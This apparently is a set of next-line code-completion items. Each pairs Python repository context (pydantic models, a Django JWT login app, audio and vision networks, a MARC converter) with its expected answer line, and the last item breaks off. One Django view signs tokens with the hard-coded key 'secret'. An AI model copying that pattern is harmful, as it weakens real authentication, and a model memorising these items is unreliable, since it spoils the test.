You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: KatantDev/YMdantic # Path: ymdantic/mixins.py class DeprecatedMixin: """Миксин, удаляющий устаревшие поля из модели.""" @model_validator(mode="before") def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]: """ Удаляет устаревшие поля из модели. :param obj: Словарь с данными модели. :return: Словарь с данными модели без устаревших полей. """ obj.pop("substituted", None) obj.pop("deprecation", None) obj.pop("decomposed", None) if obj.get("version") is not None: obj["title"] += f" ({obj.get('version')})" obj.pop("version") return obj # Path: ymdantic/models/base.py class YMBaseModel(BaseModel, ClientMixin): """Базовая Pydantic модель для всех будущих моделей.""" model_config = ConfigDict( alias_generator=to_camel, populate_by_name=True, extra="forbid", ) # Path: ymdantic/models/cover.py class Cover(YMBaseModel): """Pydantic модель, представляющая обложку альбома или артиста.""" type: Literal["from-artist-photos", "from-album-cover"] # Тип обложки. Определяет источник обложки. uri: str # URI обложки. Это уникальный идентификатор, который можно использовать # для получения изображения обложки. prefix: str # Префикс URI. Используется для формирования полного пути к изображению # обложки. copyright_name: Optional[str] = None # Название правообладателя обложки. Используется очень редко. copyright_cline: Optional[str] = None # Копирайт обложки. Используется очень редко. def get_image_url(self, size: str = "200x200") -> HttpUrl: """ Возвращает URL изображения обложки с заданным размером. :param size: Размер изображения. :return: URL изображения обложки с заданным размером. """ return HttpUrl(f"https://{self.uri.replace('%%', size)}") # Path: ymdantic/models/artists/artist.py from typing import List, Optional, Dict, Any, Literal from pydantic import model_validator, HttpUrl from ymdantic.mixins import DeprecatedMixin from ymdantic.models.base import YMBaseModel from ymdantic.models.cover import Cover class Artist(YMBaseModel, DeprecatedMixin): """Pydantic модель, представляющая информацию об артисте.""" id: int # Уникальный идентификатор артиста. name: str # Имя артиста. various: bool # Флаг, указывающий, является ли артист группой. composer: bool # Флаг, указывающий, является ли артист композитором. genres: List[str] # Жанры треков артиста. disclaimers: List[Literal[""]] # TODO: Проверить, что тут может быть. # Список отказов от ответственности артиста.
cover: Optional[Cover] = None
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: MichealCodez/awesome-project-ideas # Path: projects/artisans/backend/authentication/serializers.py class RegisterUserSerializer(serializers.ModelSerializer): class Meta: model = User # We defined the model to be the User model(default django User model). fields = ['id', 'first_name', 'last_name', 'username', 'email', 'password'] # Fields we need to register a user. # This code snippet is used to make the password field write only(not among user's data that'll be returned) for security reasons. extra_kwargs = { 'password':{'write_only':True} } # Let us hash the password for security reasons. def create(self, validated_data): password = validated_data.pop('password', None) # We are getting the password from the validated data. instance = self.Meta.model(**validated_data) # We are creating an instance of the User model with the validated data. if password is not None: instance.set_password(password) # We are hashing the password here. instance.save() # We are saving the instance. return instance # We are returning the instance. # Path: projects/artisans/backend/authentication/serializers.py class ResetPasswordSerializer(serializers.Serializer): user = User email = serializers.EmailField(required=True) new_password = serializers.CharField(max_length=68, required=True) confirm_password = serializers.CharField(max_length=68, required=True) # Path: projects/artisans/backend/authentication/views.py from rest_framework.views import APIView from .serializers import RegisterUserSerializer, ResetPasswordSerializer from rest_framework.response import Response from rest_framework.exceptions import AuthenticationFailed from django.contrib.auth.models import User from datetime import datetime, timedelta import jwt # This is the view logic for registering a user. # We defined the class and it inherits from the APIView class. class RegisterUserView(APIView): def post(self, request): # We defined a post method that takes in a request from a user. # We defined a serializer variable that takes in the RegisterUserSerializer class and passes in the request data. serializer = RegisterUserSerializer(data=request.data) serializer.is_valid(raise_exception=True) # We are checking if the serializer is valid(we raise an exception if it is not valid). serializer.save() # We save the serializer. return Response(serializer.data) # We return the serializer data. # This is the view logic for logging a user in. class LoginUserView(APIView): def post(self, request): # We defined a post method that takes in a request from a user. email = request.data['email'] # We are getting the inputted email from the request data. password = request.data['password'] # We are getting the inputted password from the request data. # Let's check if the user exists in our database. user = User.objects.filter(email=email).first() if user is None: raise AuthenticationFailed('User not found!') # Let's check if the password is correct. if not user.check_password(password): raise AuthenticationFailed('Incorrect password!') # Let's create a payload variable that takes in the user's id and the current time. payload = { 'id':user.id, 'exp':datetime.utcnow() + timedelta(minutes=60), 'iat':datetime.utcnow() } # Let's create a token variable that takes in the payload and the secret key. token = jwt.encode(payload, 'secret', algorithm='HS256') response = Response() # We are setting the cookie to the token. response.set_cookie(key='jwt', value=token, httponly=True) # We are returning the response data and making sure it is in string format. response.data = { 'jwt':token.encode('utf8') } return response # This is the view logic to retrieve a user's data using the token. class UserView(APIView): def get(self, request): token = request.COOKIES.get('jwt') if not token: raise AuthenticationFailed('Unauthenticated!') # We are getting the payload from the token. try: payload = jwt.decode(token, 'secret', algorithms=['HS256']) except jwt.ExpiredSignatureError: raise AuthenticationFailed('Unauthenticated!') # We are getting the user from the payload. user = User.objects.filter(id=payload['id']).first() serializer = RegisterUserSerializer(user) return Response(serializer.data) # This is the view logic to logout a user. class LogoutView(APIView): def post(self, request): response = Response() response.delete_cookie('jwt') # We are deleting the cookie. # We are returning the response data with a success status message. response.data = { 'message':'Logout is successful' } return response # This is the logic for resetting a forgotten password. class ResetPasswordView(APIView): def post(self, request):
serializer = ResetPasswordSerializer(data=request.data)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: liuhuang31/hifigan-sr # Path: env.py class AttrDict(dict): def __init__(self, *args, **kwargs): super(AttrDict, self).__init__(*args, **kwargs) self.__dict__ = self # Path: meldataset.py def mel_spectrogram(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False, training=False): # if torch.min(y) < -1.: # print('min value is ', torch.min(y)) # if torch.max(y) > 1.: # print('max value is ', torch.max(y)) if training: with torch.no_grad(): # 16k to 24k/48k if fmax <= 8000 and (sampling_rate == 24000 or sampling_rate == 48000): y = y.squeeze().cpu().numpy() y = librosa.resample(y, sampling_rate, 16000) y = librosa.resample(y, 16000, 24000) y = torch.FloatTensor(y) y = y.unsqueeze(0) sampling_rate = 24000 n_fft = int(n_fft/2) hop_size=int(hop_size/2) win_size=int(win_size/2) # 24k to 48k elif fmax <= 12000 and sampling_rate == 48000: y = y.squeeze().cpu().numpy() y = librosa.resample(y, sampling_rate, 24000) y = torch.FloatTensor(y) y = y.unsqueeze(0) sampling_rate = 24000 n_fft = int(n_fft/2) hop_size=int(hop_size/2) win_size=int(win_size/2) else: pass global mel_basis, hann_window if fmax not in mel_basis: mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device) hann_window[str(y.device)] = torch.hann_window(win_size).to(y.device) y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') y = y.squeeze(1) spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[str(y.device)], center=center, pad_mode='reflect', normalized=False, onesided=True) spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9)) spec = torch.matmul(mel_basis[str(fmax)+'_'+str(y.device)], spec) spec = spectral_normalize_torch(spec) return spec # Path: meldataset.py MAX_WAV_VALUE = 32768.0 # Path: meldataset.py def load_wav(full_path, sr): # sampling_rate, data = read(full_path) data, sampling_rate = librosa.load(full_path, mono=True, sr=sr) return data, sampling_rate # Path: models.py class Generator(torch.nn.Module): def __init__(self, h): super(Generator, self).__init__() self.h = h self.num_kernels = len(h.resblock_kernel_sizes) self.num_upsamples = len(h.upsample_rates) self.conv_pre = weight_norm(Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3)) resblock = ResBlock1 if h.resblock == '1' else ResBlock2 self.ups = nn.ModuleList() for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)): self.ups.append(weight_norm( ConvTranspose1d(h.upsample_initial_channel//(2**i), h.upsample_initial_channel//(2**(i+1)), k, u, padding=(k-u)//2))) self.resblocks = nn.ModuleList() for i in range(len(self.ups)): ch = h.upsample_initial_channel//(2**(i+1)) for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)): self.resblocks.append(resblock(h, ch, k, d)) self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3)) self.ups.apply(init_weights) self.conv_post.apply(init_weights) def forward(self, x): x = self.conv_pre(x) for i in range(self.num_upsamples): x = F.leaky_relu(x, LRELU_SLOPE) x = self.ups[i](x) xs = None for j in range(self.num_kernels): if xs is None: xs = self.resblocks[i*self.num_kernels+j](x) else: xs += self.resblocks[i*self.num_kernels+j](x) x = xs / self.num_kernels x = F.leaky_relu(x) x = self.conv_post(x) x = torch.tanh(x) return x def remove_weight_norm(self): print('Removing weight norm...') for l in self.ups: remove_weight_norm(l) for l in self.resblocks: l.remove_weight_norm() remove_weight_norm(self.conv_pre) remove_weight_norm(self.conv_post) # Path: inference.py import glob import os import librosa import argparse import json import torch from scipy.io.wavfile import write from env import AttrDict from meldataset import mel_spectrogram, MAX_WAV_VALUE, load_wav from models import Generator from __future__ import absolute_import, division, print_function, unicode_literals h = None device = None def load_checkpoint(filepath, device): assert os.path.isfile(filepath) print("Loading '{}'".format(filepath)) checkpoint_dict = torch.load(filepath, map_location=device) print("Complete.") return checkpoint_dict def get_mel(x): return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax) def get_mel_24k(x): return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000) def scan_checkpoint(cp_dir, prefix): pattern = os.path.join(cp_dir, prefix + '*') cp_list = glob.glob(pattern) if len(cp_list) == 0: return '' return sorted(cp_list)[-1] def inference(a):
generator = Generator(h).to(device)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: edsu/marctable # Path: marctable/marc.py class MARC: def __init__(self) -> None: self.fields: List[Field] = [] @cache def get_field(self, tag: str) -> Field: for field in self.fields: if field.tag == tag: return field raise SchemaFieldError(f"{tag} is not a defined field tag in Avram schema") @cache def get_subfield(self, tag: str, code: str) -> Subfield: field = self.get_field(tag) return field.get_subfield(code) @property def avram_file(self) -> pathlib.Path: return pathlib.Path(__file__).parent / "marc.json" @classmethod @cache def from_avram(cls: Type["MARC"], avram_file: Optional[IO] = None) -> "MARC": marc = MARC() if avram_file is None: avram_file = marc.avram_file.open("r") for d in json.load(avram_file)["fields"].values(): marc.fields.append(Field.from_dict(d)) return marc def to_avram(self, avram_file: Optional[IO] = None) -> None: if avram_file is None: avram_file = self.avram_file.open("w") d = { "title": "MARC21 bibliographic format", "url": "https://www.loc.gov/marc/bibliographic/", "family": "marc", "language": "en", "fields": {f.tag: f.to_dict() for f in self.fields}, } json.dump(d, avram_file, indent=2) # Path: marctable/marc.py class SchemaFieldError(Exception): pass # Path: marctable/marc.py class SchemaSubfieldError(Exception): pass # Path: marctable/marc.py def crawl(n: int = 0, quiet: bool = False, outfile: IO = sys.stdout) -> None: marc = MARC() for f in fields(): marc.fields.append(f) if not quiet: print(f) if n != 0 and len(marc.fields) >= n: break marc.to_avram(outfile) # Path: marctable/utils.py def _mapping(rules: list) -> dict: """ unpack the mapping rules into a dictionary for easy lookup >>> _mapping(["245", "260ac"]) {'245': None, '260': ['a', 'c']} """ marc = MARC.from_avram() if rules is None or len(rules) == 0: rules = [field.tag for field in marc.fields] m = {} for rule in rules: field_tag = rule[0:3] if marc.get_field(field_tag) is None: raise Exception(f"unknown MARC field in mapping rule: {rule}") subfields = set(list(rule[3:])) for subfield_code in subfields: if marc.get_subfield(field_tag, subfield_code) is None: raise Exception(f"unknown MARC subfield in mapping rule: {rule}") m[field_tag] = subfields or None return m # Path: marctable/utils.py def dataframe_iter( marc_input: BinaryIO, rules: list = [], batch: int = 1000 ) -> Generator[DataFrame, None, None]: columns = _columns(_mapping(rules)) for records_batch in records_iter(marc_input, rules, batch): yield DataFrame.from_records(records_batch, columns=columns) # Path: marctable/utils.py def to_csv( marc_input: BinaryIO, csv_output: TextIO, rules: list = [], batch: int = 1000, ) -> None: """ Convert MARC to CSV. """ first_batch = True for df in dataframe_iter(marc_input, rules=rules, batch=batch): df.to_csv(csv_output, header=first_batch, index=False) first_batch = False # Path: marctable/utils.py def to_dataframe(marc_input: BinaryIO, rules: list = []) -> DataFrame: """ Return a single DataFrame for the entire dataset. """ return next(dataframe_iter(marc_input, rules, batch=0)) # Path: marctable/utils.py def to_parquet( marc_input: BinaryIO, parquet_output: IOBase, rules: list = [], batch: int = 1000, ) -> None: """ Convert MARC to Parquet. """ schema = _make_parquet_schema(rules) writer = ParquetWriter(parquet_output, schema, compression="SNAPPY") for records_batch in records_iter(marc_input, rules=rules, batch=batch): table = pyarrow.Table.from_pylist(records_batch, schema) writer.write_table(table) writer.close() # Path: test_marctable.py import json import pathlib import pandas from io import StringIO from marctable.marc import MARC, SchemaFieldError, SchemaSubfieldError, crawl from marctable.utils import _mapping, dataframe_iter, to_csv, to_dataframe, to_parquet from pytest import raises marc = MARC.from_avram() def test_crawl() -> None: # crawl the first 10 field definitions from the loc site (to save time) outfile = StringIO() crawl(10, quiet=True, outfile=outfile) outfile.seek(0) # ensure the Avram JSON parses and looks ok schema = json.load(outfile) assert schema assert len(schema["fields"]) == 10 # ensure that the Avram JSON for a field looks ok assert schema["fields"]["015"] f015 = schema["fields"]["015"] assert f015["label"] == "National Bibliography Number" assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html" assert len(f015["subfields"]) == 6 # ensure that the Avram JSON for a subfield looks ok assert f015["subfields"]["2"] f0152 = f015["subfields"]["2"] assert f0152["label"] == "Source" assert f0152["code"] == "2" assert f0152["repeatable"] is False def test_marc() -> None: assert len(marc.fields) == 215 def test_get_field() -> None: assert marc.get_field("245")
with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: WangWenhao0716/ViT4ICD # Path: Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py def resnet50_ibn_a(pretrained=False, **kwargs): """Constructs a ResNet-50 model. Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs) if pretrained: print("Loading a pre-trained model!") state_dict = torch.load(model_urls['ibn_resnet50a'], map_location=torch.device('cpu'))['state_dict'] state_dict = remove_module_key(state_dict) model.load_state_dict(state_dict) return model # Path: Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py def resnet101_ibn_a(pretrained=False, **kwargs): """Constructs a ResNet-101 model. Args: pretrained (bool): If True, returns a model pre-trained on ImageNet """ model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs) if pretrained: state_dict = torch.load(model_urls['ibn_resnet101a'], map_location=torch.device('cpu'))['state_dict'] state_dict = remove_module_key(state_dict) model.load_state_dict(state_dict) return model # Path: Stage_23/dg/models_gem_waveblock_balance_cos/gem.py class GeneralizedMeanPoolingP(GeneralizedMeanPooling): """ Same, but norm is trainable """ def __init__(self, norm=3, output_size=1, eps=1e-6): super(GeneralizedMeanPoolingP, self).__init__(norm, output_size, eps) self.p = nn.Parameter(torch.ones(1) * norm) # Path: Stage_23/dg/models_gem_waveblock_balance_cos/metric.py def build_metric(loss_type, in_dim, out_dim, s=64, m=0.35, **kwargs): if (loss_type=='circle'): return CircleLoss(in_dim, out_dim, s, m) elif (loss_type=='arc'): return Arcface(in_dim, out_dim, s, m) elif (loss_type=='cos'): return MarginCosineProduct(in_dim, out_dim, s, m) elif (loss_type=='am'): return AMSoftmax(in_dim, out_dim, s, m) else: assert "Unknown metric {}".format(loss_type) # Path: Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn.py from torch import nn from torch.nn import functional as F from torch.nn import init from .resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a from .gem import GeneralizedMeanPoolingP from .metric import build_metric import torchvision import torch import random from __future__ import absolute_import __all__ = ['ResNetIBN', 'resnet_ibn50a', 'resnet_ibn101a'] class Waveblock(nn.Module): def __init__(self): super().__init__() def forward(self, x): if self.training: h, w = x.size()[-2:] rh = round(0.3 * h) sx = random.randint(0, h-rh) mask = (x.new_ones(x.size()))*1.5 mask[:, :, sx:sx+rh, :] = 1 x = x * mask return x class ResNetIBN(nn.Module): __factory = {
'50a': resnet50_ibn_a,
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Noubissie237/myShop # Path: myShop/shop/utiles.py def commandeAnonyme(request, data): print("utilisateur non authentifie") print('cookies', request.COOKIES) name = data['form']['name'] print('data', data) print('name', name) username = data['form']['username'] email = data['form']['email'] phone = data['form']['phone'] cookie_panier = panier_cookie(request) articles = cookie_panier['articles'] client, created = Client.objects.get_or_create( email = email ) client.name = name client.save() commande = Commande.objects.create( client=client ) for article in articles: produit = Produit.objects.get(id=article['produit']['id']) CommandeArticle.objects.create( produit=produit, commande = commande, quantite = article['quantite'] ) return client, commande # Path: myShop/shop/utiles.py def data_cookie(request): if request.user.is_authenticated: client = request.user.client commande, created = Commande.objects.get_or_create(client=client, complete=False) articles = commande.commandearticle_set.all() nombre_article = commande.get_panier_article else: cookie_panier = panier_cookie(request) articles = cookie_panier['articles'] commande = cookie_panier['commande'] nombre_article = cookie_panier['nombre_article'] context = { 'articles': articles, 'commande': commande, 'nombre_article': nombre_article } return context # Path: myShop/shop/utiles.py def panier_cookie(request): try: panier = json.loads(request.COOKIES.get('panier')) except: panier = {} articles = [] commande = { 'get_panier_total':0, 'get_panier_article':0, 'produit_physique':False, } nombre_article = commande['get_panier_article'] try: for obj in panier: nombre_article += panier[obj]['qte'] produit = Produit.objects.get(id=obj) total = (produit.price * panier[obj]['qte']) commande['get_panier_article'] += panier[obj]['qte'] commande['get_panier_total'] += total article = { 'produit':{ 'id': produit.id, 'name': produit.name, 'price': produit.price, 'imageUrl': produit.imageUrl }, 'quantite': panier[obj]['qte'], 'get_total': total } articles.append(article) if produit.digital == False: commande['produit_physique'] = True except: pass context = { 'articles': articles, 'commande': commande, 'nombre_article': nombre_article } return context # Path: myShop/shop/views.py from django.shortcuts import render from .models import * from django.http import JsonResponse from datetime import datetime from .utiles import commandeAnonyme, data_cookie, panier_cookie import json def shop(request, *args, **kwargs): """ vue principale """ produits = Produit.objects.all() data = data_cookie(request) nombre_article = data['nombre_article'] context = { 'produits':produits, 'nombre_article': nombre_article } return render(request, 'shop/index.html', context) def panier(request, *args, **kwargs): """ panier """ data = data_cookie(request) articles = data['articles'] commande = data['commande'] nombre_article = data['nombre_article'] context = { 'articles':articles, 'commande':commande, 'nombre_article':nombre_article } return render(request, 'shop/panier.html', context) def commande(request, *args, **kwargs): """ Commande """ data = data_cookie(request) articles = data['articles'] commande = data['commande'] nombre_article = data['nombre_article'] context = { 'articles':articles, 'commande':commande, 'nombre_article': nombre_article } return render(request, 'shop/commande.html', context) def update_article(request, *args, **kwargs): data = json.loads(request.body) produit_id = data['produit_id'] action = data['action'] client = request.user.client produit = Produit.objects.get(id=produit_id) commande, created = Commande.objects.get_or_create(client=client, complete=False) commande_article, created = CommandeArticle.objects.get_or_create(commande=commande, produit=produit) if action == 'add': commande_article.quantite += 1 if action == 'remove': commande_article.quantite -= 1 commande_article.save() if commande_article.quantite <= 0: commande_article.delete() return JsonResponse("Article ajouté", safe=False) def traitementCommande(request, *args, **kwargs): """ traitement, validation de la com;ande et verification de l'integrite des donnees(detection de fraude)""" STATUS_TRANSACTION = ['ACCEPTED', 'COMPLETED', 'SUCESS'] transaction_id = datetime.now().timestamp() data = json.loads(request.body) print(data) if request.user.is_authenticated: client = request.user.client commande, created = Commande.objects.get_or_create(client=client, complete=False) else:
client, commande = commandeAnonyme(request, data)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: alibaba/u2mot # Path: yolox/models/darknet.py class Darknet(nn.Module): # number of blocks from dark2 to dark5. depth2blocks = {21: [1, 2, 2, 1], 53: [2, 8, 8, 4]} def __init__( self, depth, in_channels=3, stem_out_channels=32, out_features=("dark3", "dark4", "dark5"), ): """ Args: depth (int): depth of darknet used in model, usually use [21, 53] for this param. in_channels (int): number of input channels, for example, use 3 for RGB image. stem_out_channels (int): number of output chanels of darknet stem. It decides channels of darknet layer2 to layer5. out_features (Tuple[str]): desired output layer name. """ super().__init__() assert out_features, "please provide output features of Darknet" self.out_features = out_features self.stem = nn.Sequential( BaseConv(in_channels, stem_out_channels, ksize=3, stride=1, act="lrelu"), *self.make_group_layer(stem_out_channels, num_blocks=1, stride=2), ) in_channels = stem_out_channels * 2 # 64 num_blocks = Darknet.depth2blocks[depth] # create darknet with `stem_out_channels` and `num_blocks` layers. # to make model structure more clear, we don't use `for` statement in python. self.dark2 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[0], stride=2) ) in_channels *= 2 # 128 self.dark3 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[1], stride=2) ) in_channels *= 2 # 256 self.dark4 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[2], stride=2) ) in_channels *= 2 # 512 self.dark5 = nn.Sequential( *self.make_group_layer(in_channels, num_blocks[3], stride=2), *self.make_spp_block([in_channels, in_channels * 2], in_channels * 2), ) def make_group_layer(self, in_channels: int, num_blocks: int, stride: int = 1): "starts with conv layer then has `num_blocks` `ResLayer`" return [ BaseConv(in_channels, in_channels * 2, ksize=3, stride=stride, act="lrelu"), *[(ResLayer(in_channels * 2)) for _ in range(num_blocks)], ] def make_spp_block(self, filters_list, in_filters): m = nn.Sequential( *[ BaseConv(in_filters, filters_list[0], 1, stride=1, act="lrelu"), BaseConv(filters_list[0], filters_list[1], 3, stride=1, act="lrelu"), SPPBottleneck( in_channels=filters_list[1], out_channels=filters_list[0], activation="lrelu", ), BaseConv(filters_list[0], filters_list[1], 3, stride=1, act="lrelu"), BaseConv(filters_list[1], filters_list[0], 1, stride=1, act="lrelu"), ] ) return m def forward(self, x): outputs = {} x = self.stem(x) outputs["stem"] = x x = self.dark2(x) outputs["dark2"] = x x = self.dark3(x) outputs["dark3"] = x x = self.dark4(x) outputs["dark4"] = x x = self.dark5(x) outputs["dark5"] = x return {k: v for k, v in outputs.items() if k in self.out_features} # Path: yolox/models/network_blocks.py class BaseConv(nn.Module): """A Conv2d -> Batchnorm -> silu/leaky relu block""" def __init__( self, in_channels, out_channels, ksize, stride, groups=1, bias=False, act="silu" ): super().__init__() # use same padding pad = (ksize - 1) // 2 self.conv = nn.Conv2d( in_channels, out_channels, kernel_size=ksize, stride=stride, padding=pad, groups=groups, bias=bias, ) self.bn = nn.BatchNorm2d(out_channels) self.act = get_activation(act, inplace=True) def forward(self, x): ''' x --> Conv2d --> BN --> activation --> x ''' return self.act(self.bn(self.conv(x))) # Conv ==> BN ==> activate def fuseforward(self, x): return self.act(self.conv(x)) # Path: yolox/models/yolo_fpn.py import torch import torch.nn as nn from .darknet import Darknet from .network_blocks import BaseConv #!/usr/bin/env python3 # -*- encoding:utf-8 -*- # Copyright (c) 2014-2021 Megvii Inc. All rights reserved. # Copyright (c) Alibaba, Inc. and its affiliates. class YOLOFPN(nn.Module): """ YOLOFPN module. Darknet 53 is the default backbone of this model. """ def __init__( self, depth=53, in_features=["dark3", "dark4", "dark5"], ): super().__init__() self.backbone = Darknet(depth) self.in_features = in_features # out 1 self.out1_cbl = self._make_cbl(512, 256, 1) self.out1 = self._make_embedding([256, 512], 512 + 256) # out 2 self.out2_cbl = self._make_cbl(256, 128, 1) self.out2 = self._make_embedding([128, 256], 256 + 128) # upsample self.upsample = nn.Upsample(scale_factor=2, mode="nearest") def _make_cbl(self, _in, _out, ks):
return BaseConv(_in, _out, ks, stride=1, act="lrelu")
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: liuhuang31/HiFTNet-sr # Path: utils.py def init_weights(m, mean=0.0, std=0.01): classname = m.__class__.__name__ if classname.find("Conv") != -1: m.weight.data.normal_(mean, std) # Path: utils.py def get_padding(kernel_size, dilation=1): return int((kernel_size*dilation - dilation)/2) # Path: stft.py class TorchSTFT(torch.nn.Module): def __init__(self, filter_length=800, hop_length=200, win_length=800, window='hann'): super().__init__() self.filter_length = filter_length self.hop_length = hop_length self.win_length = win_length self.window = torch.from_numpy(get_window(window, win_length, fftbins=True).astype(np.float32)) def transform(self, input_data): forward_transform = torch.stft( input_data, self.filter_length, self.hop_length, self.win_length, window=self.window.to(input_data.device), return_complex=True) return torch.abs(forward_transform), torch.angle(forward_transform) def inverse(self, magnitude, phase): inverse_transform = torch.istft( magnitude * torch.exp(phase * 1j), self.filter_length, self.hop_length, self.win_length, window=self.window.to(magnitude.device)) return inverse_transform.unsqueeze(-2) # unsqueeze to stay consistent with conv_transpose1d implementation def forward(self, input_data): self.magnitude, self.phase = self.transform(input_data) reconstruction = self.inverse(self.magnitude, self.phase) return reconstruction # Path: models.py import torch import torch.nn.functional as F import torch.nn as nn import numpy as np from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm from utils import init_weights, get_padding from stft import TorchSTFT LRELU_SLOPE = 0.1 class ResBlock1(torch.nn.Module): def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)): super(ResBlock1, self).__init__() self.h = h self.convs1 = nn.ModuleList([ weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], padding=get_padding(kernel_size, dilation[0]))), weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], padding=get_padding(kernel_size, dilation[1]))), weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], padding=get_padding(kernel_size, dilation[2]))) ])
self.convs1.apply(init_weights)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: m-abr/FCPCodebase # Path: agent/Base_Agent.py class Base_Agent(): all_agents = [] def __init__(self, host:str, agent_port:int, monitor_port:int, unum:int, robot_type:int, team_name:str, enable_log:bool=True, enable_draw:bool=True, apply_play_mode_correction:bool=True, wait_for_server:bool=True, hear_callback=None) -> None: self.radio = None # hear_message may be called during Server_Comm instantiation self.logger = Logger(enable_log, f"{team_name}_{unum}") self.world = World(robot_type, team_name, unum, apply_play_mode_correction, enable_draw, self.logger, host) self.world_parser = World_Parser(self.world, self.hear_message if hear_callback is None else hear_callback) self.scom = Server_Comm(host,agent_port,monitor_port,unum,robot_type,team_name,self.world_parser,self.world,Base_Agent.all_agents,wait_for_server) self.inv_kinematics = Inverse_Kinematics(self.world.robot) self.behavior = Behavior(self) self.path_manager = Path_Manager(self.world) self.radio = Radio(self.world, self.scom.commit_announcement) self.behavior.create_behaviors() Base_Agent.all_agents.append(self) @abstractmethod def think_and_send(self): pass def hear_message(self, msg:bytearray, direction, timestamp:float) -> None: if direction != "self" and self.radio is not None: self.radio.receive(msg) def terminate(self): # close shared monitor socket if this is the last agent on this thread self.scom.close(close_monitor_socket=(len(Base_Agent.all_agents)==1)) Base_Agent.all_agents.remove(self) @staticmethod def terminate_all(): for o in Base_Agent.all_agents: o.scom.close(True) # close shared monitor socket, if it exists Base_Agent.all_agents = [] # Path: behaviors/custom/Step/Step_Generator.py class Step_Generator(): GRAVITY = 9.81 Z0 = 0.2 def __init__(self, feet_y_dev, sample_time, max_ankle_z) -> None: self.feet_y_dev = feet_y_dev self.sample_time = sample_time self.state_is_left_active = False self.state_current_ts = 0 self.switch = False # switch legs self.external_progress = 0 # non-overlaped progress self.max_ankle_z = max_ankle_z def get_target_positions(self, reset, ts_per_step, z_span, z_extension): ''' Get target positions for each foot Returns ------- target : `tuple` (Left leg y, Left leg z, Right leg y, Right leg z) ''' assert type(ts_per_step)==int and ts_per_step > 0, "ts_per_step must be a positive integer!" #-------------------------- Advance 1ts if reset: self.ts_per_step = ts_per_step # step duration in time steps self.swing_height = z_span self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints self.state_current_ts = 0 self.state_is_left_active = False self.switch = False elif self.switch: self.state_current_ts = 0 self.state_is_left_active = not self.state_is_left_active # switch leg self.switch = False else: self.state_current_ts += 1 #-------------------------- Compute COM.y W = math.sqrt(self.Z0/self.GRAVITY) step_time = self.ts_per_step * self.sample_time time_delta = self.state_current_ts * self.sample_time y0 = self.feet_y_dev # absolute initial y value y_swing = y0 + y0 * ( math.sinh((step_time - time_delta)/W) + math.sinh(time_delta/W) ) / math.sinh(-step_time/W) #-------------------------- Cap maximum extension and swing height z0 = min(-self.max_leg_extension, self.max_ankle_z) # capped initial z value zh = min(self.swing_height, self.max_ankle_z - z0) # capped swing height #-------------------------- Compute Z Swing progress = self.state_current_ts / self.ts_per_step self.external_progress = self.state_current_ts / (self.ts_per_step-1) active_z_swing = zh * math.sin(math.pi * progress) #-------------------------- Accept new parameters after final step if 